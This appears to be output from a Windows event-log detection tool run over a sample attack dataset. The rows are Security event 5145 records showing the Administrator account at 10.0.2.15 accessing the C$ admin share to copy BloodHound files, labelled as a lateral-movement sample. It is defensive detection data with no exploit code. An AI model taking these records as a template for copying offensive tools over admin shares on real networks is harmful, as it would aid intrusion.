2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\v1  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types\v1  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\node-ratify  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\object-assign  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\once  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\utils  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\zlib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-exists  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-is-absolute  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pify  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pkg-up  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-limit  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-locate  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\bin  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\types  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\process-nextick-args  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-try  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\punycode  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\cjs  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\umd  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.139 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es\utils  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib\utils  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\prop-types-extra  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-overlays  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-prop-types  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\uncontrollable  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.199 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\cjs  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\umd  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\.github  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\components  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\icons  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\utils  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\components  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\icons  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\utils  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
